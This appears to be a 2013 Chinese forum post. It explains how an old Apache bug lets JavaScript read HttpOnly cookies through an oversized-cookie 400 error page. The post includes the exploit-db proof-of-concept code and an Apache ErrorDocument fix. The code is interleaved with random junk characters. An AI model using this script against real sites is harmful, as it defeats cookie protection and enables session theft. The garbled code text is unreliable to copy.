很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。% V$ _5 h! K% ]( \0 s9 n& F4 c5 j
: _* k" o# Z/ A" T/ I9 ]6 d用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
( i. x- D5 h2 Z8 F - j' f: y. Q7 z, ?0 M' O! ]! ^ y
- p L( N; r- s9 W4 [9 l% Z
// http://www.exploit-db.com/exploits/18442/
1 V* B" s' q8 g, c% gfunction setCookies (good) {% j: Q! o' a3 m3 x: x
// Construct string for cookie value9 u0 d$ @' U8 B" N
var str = "";
$ ?# s( n3 K: k7 _: D+ R- ~( m" @for (var i=0; i< 819; i++) {5 R' ] m+ O& q" t( ^
str += "x";8 Q3 M1 ~. [* A; r* x
}
& x* I0 \% z8 k" C# b+ p// Set cookies
( v/ H& F# W6 U Jfor (i = 0; i < 10; i++) {
& Q' \2 ?9 U- k4 ~// Expire evil cookie
6 ?1 n6 r* Q* F0 Lif (good) {9 i' y. H% f# {( I1 w# m V, [6 R
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";7 A+ x$ x& S5 I4 A! Z
}+ r4 @5 r `( L9 O
// Set evil cookie$ f) I+ {6 ~* M2 S8 q, M: u
else {9 P! _) Y4 P/ Z- _
var cookie = "xss"+i+"="+str+";path=/";
$ o7 r% {4 l- b1 G- K, {6 a}% [( Z. a p# m, K- a5 N6 U/ k
document.cookie = cookie;. q, C( Y [2 i6 ]
}' C/ `: v3 h) S+ Y Q
}# q/ J$ e8 I% d! U
function makeRequest() {; E1 O9 s; \' t4 _3 ?
setCookies();- U* l/ p5 A9 X4 X8 ^' ~- ?
function parseCookies () {
4 y/ s3 y' R" E" }% X' Zvar cookie_dict = {};
. \8 ^$ a! [/ [' s$ k+ G( J// Only react on 400 status: u! S4 {( U, \5 ?. g" i
if (xhr.readyState === 4 && xhr.status === 400) {
, v, `/ I+ ^; n- r" i// Replace newlines and match <pre> content$ Y8 i$ A( _% U& l# {
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
D# x7 m; g2 K. I3 V' ~: qif (content.length) {5 I2 o7 x( t' d! I+ ^* i& k9 j3 g+ D
// Remove Cookie: prefix2 S" n* r/ e% F9 W- I5 J
content = content[1].replace("Cookie: ", "");
1 [& d" J* g! Z& pvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);* R( m, w# N) z. v( `! s9 a
// Add cookies to object
0 {- r# {+ i! o" ?for (var i=0; i<cookies.length; i++) {# ]) f/ q7 t, O
var s_c = cookies.split('=',2);+ v+ a/ n/ F7 U
cookie_dict[s_c[0]] = s_c[1];
5 Z) `7 M1 O% _& G4 k1 h, K, H}
, F6 v+ O3 l0 ?% N# E! N- C}7 {- s/ u6 i2 ?9 Z K& D
// Unset malicious cookies
# H* Q9 ]% d$ \/ a' n* v+ ^setCookies(true);$ o" I6 J# ~ Z1 y0 m2 s8 r; B2 W
alert(JSON.stringify(cookie_dict));
- _# P3 m6 m, Y( F}
" D! x5 i- F) S, `}
0 b3 v/ `- A7 ^4 H4 q) Z// Make XHR request
% |2 L# s1 T/ t/ P `9 G+ ]var xhr = new XMLHttpRequest();- p$ ~7 ^' z- K' _' _) E8 a* U
xhr.onreadystatechange = parseCookies;( x* `3 [ }: K
xhr.open("GET", "/", true);
( V" M0 d5 B- z0 a' z9 }xhr.send(null);
7 R- _ K% `0 h}7 Y, x; m7 q* U8 `
makeRequest();* @# z5 B7 p4 r" O! T1 r
: w. R- V. }6 q4 \# ] @$ T/ W你就能看见华丽丽的400错误包含着cookie信息。* X* V: K7 c, @# y* f
+ b! p1 g) c* Y下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
/ Q) A. L$ B8 }9 V( ^) m7 H: h% U! o5 y2 |$ m- F
修复方案:+ J) N5 Q5 X" v% D+ U n
+ ~: M/ i/ _) R, v) d. n% {Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下2 n* u2 @3 |" Z) F% t
' ^; m3 D; ?- `$ `# T
In the event of a problem or error, Apachecan be configured to do one of four things,1 C) G% v9 B D- l. H0 j
4 s9 t" H) N* b, r$ W9 Q' b$ T+ x1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
2 u, H3 w. [# T4 t, @, e9 \2. output acustomized message输出一段信息
0 e0 ?# [7 g" c$ E9 k3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 % f- l5 i( b/ B3 E! N0 [5 a& X
4. redirect to an external URL to handle theproblem/error转向一个外部URL1 Q. R" g, f. O) a' J ~: i
, K+ e4 X' r3 b& v# R: r' O& N( _- T
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容; p1 a' m& K) c* L6 e* `" W
e' n3 i0 q/ P3 w5 J+ h+ F
Apache配置:
; G% y: Y5 X |
! A1 E1 ~5 e6 y8 ^ErrorDocument400 " security test"
$ H+ P0 S! @* y6 w3 B4 L) q5 J7 i2 E+ N- g
当然,升级apache到最新也可:)。
: q% a; t: [5 k2 j+ V
9 H/ V4 q- f$ U/ n A参考:http://httpd.apache.org/security/vulnerabilities_22.html( w9 t4 _! A F U) e& N
s# S+ o7 n" S+ f |
发表于 2013-4-19 19:15:43
收藏
支持
反对